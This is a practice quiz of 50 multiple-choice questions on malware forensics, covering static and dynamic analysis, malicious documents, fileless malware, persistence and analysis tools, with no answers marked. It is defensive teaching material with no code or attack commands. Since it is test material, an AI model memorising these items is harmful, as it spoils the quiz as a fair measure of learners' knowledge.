1 $What is the primary definition of malware in the context of digital evidence analysis?$

A.

Malicious software designed to disrupt, damage, or gain unauthorized access to a computer system

B.

Network protocols used for secure communication

C.

Software designed to improve system performance

D.

Hardware components that fail due to overheating

2 $Which of the following is a common technique used by attackers to spread malware via email?$

A.

Port Scanning

B.

SQL Injection

C.

Packet Sniffing

D.

Phishing

3 $What is a 'Drive-by Download'?$

A.

Manually downloading a file from an email

B.

Downloading software from a physical drive

C.

Unintended download of malicious code by visiting a compromised website

D.

Copying files from a USB stick

4 $Which term describes malicious advertisements used to distribute malware?$

A.

Adware

B.

Ransomware

C.

Spyware

D.

Malvertising

5 $What is the primary goal of Malware Forensics?$

A.

To increase network speed

B.

To design new antivirus software

C.

To repair broken hardware

D.

To understand the capabilities, origin, and impact of a malicious sample

6 $Which analysis type involves examining the malware without executing it?$

A.

Behavioral Analysis

B.

Memory Forensics

C.

Static Analysis

D.

Dynamic Analysis

7 $Which environment is most recommended for performing malware analysis to prevent infection of the host system?$

A.

Production Server

B.

An isolated Virtual Machine (VM) or Sandbox

C.

A public Wi-Fi network

D.

The analyst's personal laptop

8 $In Static Analysis, what is the purpose of calculating the file hash (MD5, SHA256)?$

A.

To decrypt the file

B.

To execute the file safely

C.

To compress the file size

D.

To identify the file uniquely and check against databases like VirusTotal

9 $What tool is commonly used in static analysis to extract readable text strings from a binary?$

A.

Process Monitor

B.

Wireshark

C.

Strings

D.

Fiddler

10 $What does 'packing' refer to in the context of malware?$

A.

Zipping a file for email

B.

Compressing or encrypting the executable to hide its code and evade detection

C.

Bundling malware with legitimate software

D.

Adding more features to the malware

11 $Which file format is the standard executable format for Windows, often analyzed during malware forensics?$

A.

Mach-O

B.

PE (Portable Executable)

C.

APK

D.

ELF

12 $When analyzing a suspicious PDF, what specific element is often looked for as a vector for malicious code?$

A.

Text formatting

B.

Image resolution

C.

Page margins

D.

JavaScript

13 $What is a common indicator of a malicious Microsoft Word document?$

A.

The document having a .docx extension

B.

The presence of VBA Macros (Visual Basic for Applications)

C.

The use of Arial font

D.

The file size being under 1MB

14 $Which tool is specifically designed to analyze the structure of OLE (Object Linking and Embedding) streams in Office documents?$

A.

Burp Suite

B.

Metasploit

C.

Nmap

D.

Oledump.py

15 $What is 'Dynamic Malware Analysis'?$

A.

Reading the source code

B.

Scanning the file with an antivirus

C.

Running the malware in a controlled environment to observe its behavior

D.

Checking the file creation date

16 $Which of the following is a risk associated with Dynamic Analysis?$

A.

It cannot identify network traffic

B.

It is only useful for text files

C.

It requires access to the source code

D.

The malware might detect the virtual environment and stop running

17 $What is the function of a 'snapshot' in a virtual machine during malware analysis?$

A.

To save the state of the VM so it can be reverted after infection

B.

To print the code

C.

To take a picture of the malware author

D.

To record the network traffic

18 $Which tool is widely used to monitor real-time file system, registry, and process activity on Windows?$

A.

VLC

B.

Putty

C.

FileZilla

D.

Process Monitor (ProcMon)

19 $In dynamic analysis, what does observing a change in the 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' registry key usually indicate?$

A.

The system is updating

B.

The browser is clearing cache

C.

The screen resolution is changing

D.

The malware is establishing persistence to run on startup

20 $What is 'Process Injection'?$

A.

Monitoring a process for errors

B.

Stopping a process efficiently

C.

Code belonging to one process being written into the address space of another process

D.

Installing a new process via CD

21 $What is a 'Mutex' (Mutual Exclusion) object often used for by malware?$

A.

To connect to the internet

B.

To delete system logs

C.

To encrypt user files

D.

To ensure only one instance of the malware runs at a time

22 $Which network behavior is characteristic of C2 (Command and Control) communication?$

A.

Windows Update downloads

B.

Local printing traffic

C.

Periodic 'beaconing' signals to an external server

D.

High bandwidth video streaming

23 $What is the purpose of using 'FakeNet' or 'INetSim' during dynamic analysis?$

A.

To block all network traffic permanently

B.

To hack into the malware author's computer

C.

To simulate internet services (DNS, HTTP) so malware thinks it is online

D.

To increase internet speed

24 $What is a Fileless Malware attack?$

A.

Malware transmitted via paper

B.

Malware that exists primarily in memory without writing an executable file to the disk

C.

Malware that only targets empty files

D.

Malware that deletes all files on a drive

25 $Which term refers to legitimate system tools (like PowerShell) abused by fileless malware?$

A.

Firmware

B.

Shareware

C.

LOLBins (Living off the Land Binaries)

D.

Bloatware

26 $Which of the following is a common entry point for fileless malware?$

A.

Exploit kits targeting browser vulnerabilities

B.

Installing a fresh OS

C.

Connecting a printer

D.

A physical CD-ROM

27 $What is the role of WMI (Windows Management Instrumentation) in fileless attacks?$

A.

It manages the mouse pointer

B.

It acts as a firewall

C.

It is used for graphics rendering

D.

It can be used to execute scripts and maintain persistence without files

28 $How does Domain Generation Algorithm (DGA) help malware?$

A.

It speeds up the infection process

B.

It generates random domain names to rendezvous with the C2 server, evading blacklists

C.

It encrypts the hard drive

D.

It generates strong passwords for the user

29 $Which tool is best suited for capturing and analyzing network packets during malware analysis?$

A.

RegEdit

B.

Wireshark

C.

Notepad++

D.

Resource Hacker

30 $What is 'import hashing' (Imphash)?$

A.

Hashing the user's password

B.

Hashing the list of imported functions to identify related malware samples

C.

Hashing the file name

D.

Hashing the network traffic

31 $What is a 'Trojan Horse'?$

A.

Hardware used to steal data

B.

Malware that locks the screen

C.

Self-replicating malware

D.

Malware disguised as legitimate software to mislead users of its true intent

32 $Which component of the PE header contains information about the compilation time of the malware?$

A.

Pointer to Symbol Table

B.

Subsystem

C.

Machine Type

D.

Time Date Stamp

33 $What does the term 'Obfuscation' mean in malware analysis?$

A.

Translating the code to English

B.

Deleting the code

C.

Making the code difficult for humans and analysis tools to understand

D.

Highlighting important code sections

34 $In the context of PDF analysis, what is a '/OpenAction'?$

A.

A font style

B.

A permission setting

C.

A command to close the file

D.

A command that specifies an action to perform immediately upon opening the document

35 $What is 'Sandboxing'?$

A.

Automated dynamic analysis in a secure environment

B.

Playing a game

C.

Encrypting a hard drive

D.

Cleaning the computer case

36 $Which of the following is a symptom of Ransomware?$

A.

The computer shuts down randomly

B.

The mouse moves slowly

C.

Files are encrypted and a payment note is displayed

D.

The web browser opens multiple tabs

37 $What is the primary difference between a Virus and a Worm?$

A.

Worms are only for Linux

B.

Viruses are hardware-based

C.

Viruses encrypt files; Worms delete them

D.

Viruses require a host file and user action to spread; Worms are self-replicating and spread automatically

38 $Why might an analyst check 'Imported Functions' (Imports) in the PE header?$

A.

To guess what the malware is capable of (e.g., networking, file manipulation)

B.

To see the file size

C.

To check the author's name

D.

To see the icon

39 $What does 'Shellcode' refer to in a malicious document?$

A.

The name of the file

B.

The visual layout of the document

C.

Machine code payload used to exploit a vulnerability

D.

The password protection

40 $Which tool allows an analyst to view active TCP and UDP connections in real-time on the host?$

A.

Notepad

B.

TCPView

C.

Calculator

D.

Paint

41 $What is 'DLL Injection'?$

A.

Renaming a DLL file

B.

Removing a DLL file

C.

Scanning DLLs for viruses

D.

Forcing a process to load a malicious Dynamic Link Library (DLL)

42 $What is the 'AutoOpen' macro in Word?$

A.

A macro that prints the file

B.

A macro that runs automatically when a document is opened

C.

A macro that saves the file

D.

A macro that changes the font

43 $How can fileless malware persist using the Windows Registry?$

A.

By storing malicious scripts in registry keys and invoking them via PowerShell

B.

By changing the desktop background

C.

By disabling the mouse

D.

By deleting the registry

44 $Which network protocol is commonly abused for data exfiltration because it is rarely blocked by firewalls?$

A.

DHCP

B.

ICMP

C.

ARP

D.

DNS (Domain Name System)

45 $What is the purpose of 'API Hooking' in malware?$

A.

To intercept function calls between the system and applications to modify or monitor behavior

B.

To organize files

C.

To speed up the internet

D.

To fix bugs in Windows

46 $Which section of a PE file typically contains the executable code?$

A.

.text

B.

.rsrc

C.

.reloc

D.

.data

47 $When analyzing a suspicious URL found in malware, what should an analyst do?$

A.

Ignore it

B.

Email the URL to friends

C.

Open it in their personal browser immediately

D.

Investigate it using reputation services or a safe sandbox environment

48 $What is the primary characteristic of a 'Rootkit'?$

A.

It displays ads

B.

It spreads via USB

C.

It is designed to hide the existence of certain processes or programs from normal detection methods

D.

It encrypts files

49 $What is 'Entropy' used for in static malware analysis?$

A.

To measure the network speed

B.

To measure the randomness of data, helping identify packed or encrypted code

C.

To measure the file temperature

D.

To count the lines of code

50 $Why is 'PowerShell' a frequent target for fileless malware?$

A.

It is a game engine

B.

It has deep access to the Windows API and system management functions without needing new binaries

C.

It is not installed on most computers

D.

It is a web browser

Unit 6 - Practice Quiz